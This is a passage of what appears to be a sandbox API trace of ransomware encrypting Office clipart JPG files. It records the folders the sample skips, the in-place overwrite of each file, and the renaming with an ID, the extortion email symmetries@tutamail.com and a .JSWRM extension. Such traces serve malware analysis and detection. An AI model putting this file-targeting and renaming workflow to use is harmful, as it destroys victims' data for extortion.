dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0086.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0086.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0086.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0086.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0086.189] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x67a3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178460.JPG", cAlternateFileName="")) returned 1 [0086.189] lstrcmpiW (lpString1="J0178460.JPG", lpString2=".") returned 1 [0086.189] lstrcmpiW (lpString1="J0178460.JPG", lpString2="..") returned 1 [0086.189] lstrcmpiW (lpString1="J0178460.JPG", lpString2="...") returned 1 [0086.189] lstrcmpiW (lpString1="J0178460.JPG", lpString2="windows") returned -1 [0086.189] lstrcmpiW (lpString1="J0178460.JPG", lpString2="recovery") returned -1 [0086.190] lstrcmpiW (lpString1="J0178460.JPG", lpString2="perflogs") returned -1 [0086.190] lstrcmpiW (lpString1="J0178460.JPG", lpString2="documents and settings") returned 1 [0086.190] lstrcmpiW (lpString1="J0178460.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.190] lstrcmpiW (lpString1="J0178460.JPG", lpString2="system volume information") returned -1 [0086.190] lstrcmpiW (lpString1="J0178460.JPG", lpString2="msocache") returned -1 [0086.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178460.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178460.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178460.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178460.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178460.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178460.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0086.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.190] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26531) returned 1 [0086.190] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24d210 [0086.191] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x67a0, lpOverlapped=0x0) returned 1 [0086.233] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.233] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x67a0, lpOverlapped=0x0) returned 1 [0086.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.233] CloseHandle (hObject=0x314) returned 1 [0086.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0086.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0086.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0086.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0086.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0086.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.234] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0086.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.235] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5de2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178523.JPG", cAlternateFileName="")) returned 1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2=".") returned 1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="..") returned 1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="...") returned 1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="windows") returned -1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="recovery") returned -1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="perflogs") returned -1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="documents and settings") returned 1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="system volume information") returned -1 [0086.235] lstrcmpiW (lpString1="J0178523.JPG", lpString2="msocache") returned -1 [0086.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0086.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178523.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178523.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178523.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0086.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0086.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178523.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178523.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178523.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0086.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0086.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.237] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24034) returned 1 [0086.237] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5de0) returned 0x24d210 [0086.237] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5de0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5de0, lpOverlapped=0x0) returned 1 [0086.240] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.240] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5de0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5de0, lpOverlapped=0x0) returned 1 [0086.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.240] CloseHandle (hObject=0x314) returned 1 [0086.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0086.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0086.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0086.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0086.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.241] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.241] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b2a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0178632.JPG", cAlternateFileName="")) returned 1 [0086.241] lstrcmpiW (lpString1="J0178632.JPG", lpString2=".") returned 1 [0086.241] lstrcmpiW (lpString1="J0178632.JPG", lpString2="..") returned 1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="...") returned 1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="windows") returned -1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="recovery") returned -1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="perflogs") returned -1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="documents and settings") returned 1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="system volume information") returned -1 [0086.242] lstrcmpiW (lpString1="J0178632.JPG", lpString2="msocache") returned -1 [0086.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0086.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178632.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178632.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178632.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178632.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0178632.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0178632.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.243] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23338) returned 1 [0086.243] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b20) returned 0x24d210 [0086.243] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5b20, lpOverlapped=0x0) returned 1 [0086.246] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.246] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5b20, lpOverlapped=0x0) returned 1 [0086.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.246] CloseHandle (hObject=0x314) returned 1 [0086.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0086.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0086.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0086.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0086.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0086.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.247] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.247] HeapFree (in: hHeap=0x1e0000, 